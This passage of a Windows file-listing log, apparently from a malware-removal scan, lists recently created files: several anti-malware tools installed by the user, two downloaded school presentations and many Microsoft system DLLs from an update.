2017-03-16 16:34 - 2017-03-16 16:34 - 00000000 ___HD C:\VTRoot
2017-03-16 16:21 - 2017-03-16 16:47 - 00024411 _____ C:\WINDOWS\ZAM.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:47 - 00014878 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zamguard64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00203680 _____ (Zemana Ltd.) C:\WINDOWS\system32\Drivers\zam64.sys
2017-03-16 16:21 - 2017-03-16 16:21 - 00001223 _____ C:\Users\Public\Desktop\Zemana AntiMalware.lnk
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Users\Nekut\AppData\Local\Zemana
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Zemana AntiMalware
2017-03-16 16:21 - 2017-03-16 16:21 - 00000000 ____D C:\Program Files (x86)\Zemana AntiMalware
2017-03-16 16:20 - 2017-03-16 16:20 - 05755024 _____ (Zemana Ltd. ) C:\Users\Nekut\Downloads\Zemana.AntiMalware.Setup.exe
2017-03-15 22:01 - 2017-03-16 16:38 - 01038464 _____ C:\WINDOWS\system32\Drivers\sfi.dat
2017-03-15 22:01 - 2017-03-15 22:01 - 00001904 _____ C:\Users\Public\Desktop\COMODO Internet Security.lnk
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\WINDOWS\System32\Tasks\COMODO
2017-03-15 22:01 - 2017-03-15 22:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\COMODO
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Shared Space
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo Downloader
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\ProgramData\Comodo
2017-03-15 22:00 - 2017-03-15 22:00 - 00000000 ____D C:\Program Files\COMODO
2017-03-15 21:58 - 2017-03-15 21:59 - 73804768 _____ (COMODO) C:\Users\Nekut\Downloads\cispremium_only_installer.exe
2017-03-15 21:55 - 2017-03-15 21:55 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-03-15 21:23 - 2017-03-15 21:58 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-03-15 21:18 - 2017-03-15 21:18 - 00000000 ____D C:\ProgramData\ProcessLasso
2017-03-15 21:10 - 2017-03-15 21:00 - 00024064 _____ C:\WINDOWS\zoek-delete.exe
2017-03-15 21:00 - 2017-03-15 21:09 - 00000000 ____D C:\zoek_backup
2017-03-15 20:59 - 2017-03-15 21:00 - 01309184 _____ C:\Users\Nekut\Downloads\zoek.exe
2017-03-15 20:55 - 2017-03-15 20:55 - 00000000 ____D C:\Users\Nekut\AppData\Local\Adobe
2017-03-15 19:40 - 2017-03-15 20:15 - 03182592 _____ C:\Users\Nekut\Downloads\Nabozenstvi.ppt
2017-03-15 19:35 - 2017-03-15 19:35 - 02073600 _____ C:\Users\Nekut\Downloads\DUM_cihakova_Svetova_nabozenstvi.ppt
2017-03-15 18:32 - 2017-03-15 20:26 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-03-15 18:32 - 2017-03-15 18:59 - 00000000 ____D C:\ProgramData\RogueKiller
2017-03-15 18:30 - 2017-03-15 18:31 - 26131528 _____ C:\Users\Nekut\Downloads\RogueKillerX64.exe
2017-03-15 18:17 - 2017-03-15 18:17 - 00000000 ____D C:\ProgramData\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00002775 _____ C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
2017-03-15 18:16 - 2017-03-15 18:16 - 00000000 ____D C:\Program Files (x86)\Sophos
2017-03-15 18:12 - 2017-03-15 18:16 - 164051504 _____ (Sophos Limited) C:\Users\Nekut\Downloads\Sophos Virus Removal Tool.exe
2017-03-15 17:57 - 2017-03-15 17:58 - 01663904 _____ (Malwarebytes) C:\Users\Nekut\Downloads\JRT.exe
2017-03-15 17:31 - 2017-03-15 21:58 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-03-15 17:30 - 2017-03-16 16:46 - 00092088 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00251840 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-15 17:30 - 2017-03-15 21:58 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-03-15 17:30 - 2017-03-15 17:30 - 00001918 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-03-15 17:30 - 2017-03-15 17:30 - 00000000 ____D C:\Program Files\Malwarebytes
2017-03-15 17:30 - 2017-02-24 06:23 - 00077408 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-03-15 17:28 - 2017-03-15 17:29 - 57131432 _____ (Malwarebytes ) C:\Users\Nekut\Downloads\mb3-setup-consumer-3.0.6.1469-1075.exe
2017-03-15 17:23 - 2017-03-15 17:51 - 00000000 ____D C:\AdwCleaner
2017-03-15 17:22 - 2017-03-15 17:23 - 04031440 _____ C:\Users\Nekut\Desktop\AdwCleaner.exe
2017-03-15 17:14 - 2017-03-15 17:14 - 00448512 _____ (OldTimer Tools) C:\Users\Nekut\Downloads\TFC.exe
2017-03-15 17:09 - 2017-03-15 17:10 - 00050688 _____ (Atribune.org) C:\Users\Nekut\Downloads\ATF-Cleaner.exe
2017-03-14 19:18 - 2017-03-14 19:18 - 00388608 _____ (Trend Micro Inc.) C:\Users\Nekut\Downloads\HijackThis.exe
2017-03-14 18:36 - 2017-03-04 08:57 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-03-14 18:36 - 2017-03-04 08:57 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-03-14 18:36 - 2017-03-04 08:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2017-03-14 18:36 - 2017-03-04 08:24 - 00090976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\IPMIDrv.sys
2017-03-14 18:36 - 2017-03-04 08:09 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2017-03-14 18:36 - 2017-03-04 08:09 - 00497416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-03-14 18:36 - 2017-03-04 08:08 - 00130912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2017-03-14 18:36 - 2017-03-04 08:07 - 00557400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2017-03-14 18:36 - 2017-03-04 08:04 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-03-14 18:36 - 2017-03-04 08:02 - 00184416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IPHLPAPI.DLL
2017-03-14 18:36 - 2017-03-04 07:56 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-03-14 18:36 - 2017-03-04 07:56 - 00248992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 02277288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2017-03-14 18:36 - 2017-03-04 07:54 - 00524776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 05722320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 02256080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00781152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00493912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-03-14 18:36 - 2017-03-04 07:53 - 00313568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-03-14 18:36 - 2017-03-04 07:53 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00549088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2017-03-14 18:36 - 2017-03-04 07:52 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-03-14 18:36 - 2017-03-04 07:51 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-03-14 18:36 - 2017-03-04 07:50 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 06667528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 04023000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01853224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01202384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 01123912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00981376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00976184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00952416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00530480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00374448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFPlay.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00352760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-03-14 18:36 - 2017-03-04 07:47 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-03-14 18:36 - 2017-03-04 07:46 - 04312248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-03-14 18:36 - 2017-03-04 07:46 - 00321792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2017-03-14 18:36 - 2017-03-04 07:45 - 00173408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-03-14 18:36 - 2017-03-04 07:45 - 00112120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gpapi.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01415240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 01260784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-03-14 18:36 - 2017-03-04 07:42 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-03-14 18:36 - 2017-03-04 07:42 - 00276832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\input.dll
2017-03-14 18:36 - 2017-03-04 07:40 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-03-14 18:36 - 2017-03-04 07:36 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-03-14 18:36 - 2017-03-04 07:34 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2017-03-14 18:36 - 2017-03-04 07:30 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-03-14 18:36 - 2017-03-04 07:30 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-03-14 18:36 - 2017-03-04 07:30 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-03-14 18:36 - 2017-03-04 07:28 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BcastDVRHelper.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00038912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2017-03-14 18:36 - 2017-03-04 07:26 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiougc.exe
2017-03-14 18:36 - 2017-03-04 07:25 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCCSEngineShared.dll
2017-03-14 18:36 - 2017-03-04 07:25 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00328192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-03-14 18:36 - 2017-03-04 07:24 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iprtrmgr.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-03-14 18:36 - 2017-03-04 07:23 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-03-14 18:36 - 2017-03-04 07:23 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netiohlp.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 01299968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\icm32.dll
2017-03-14 18:36 - 2017-03-04 07:22 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFilterHost.exe
2017-03-14 18:36 - 2017-03-04 07:21 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-03-14 18:36 - 2017-03-04 07:21 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 13873664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sud.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00534528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PCPTpm12.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00506880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msutb.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanui.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-03-14 18:36 - 2017-03-04 07:20 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00714752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-03-14 18:36 - 2017-03-04 07:19 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00318464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchFolder.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-03-14 18:36 - 2017-03-04 07:19 - 00226816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dhcpcore6.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssphtb.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2017-03-14 18:36 - 2017-03-04 07:18 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-03-14 18:36 - 2017-03-04 07:17 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-03-14 18:36 - 2017-03-04 07:17 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasgcw.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00762880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00636928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscms.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-03-14 18:36 - 2017-03-04 07:16 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 01543680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmc.exe
2017-03-14 18:36 - 2017-03-04 07:15 - 00509440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 00336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\azroleui.dll
2017-03-14 18:36 - 2017-03-04 07:15 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-03-14 18:36 - 2017-03-04 07:14 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-03-14 18:36 - 2017-03-04 07:14 - 00236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmWmiPl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 04613120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 02458112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themecpl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2017-03-14 18:36 - 2017-03-04 07:13 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-03-14 18:36 - 2017-03-04 07:12 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01323008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 01137152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2017-03-14 18:36 - 2017-03-04 07:11 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-03-14 18:36 - 2017-03-04 07:10 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
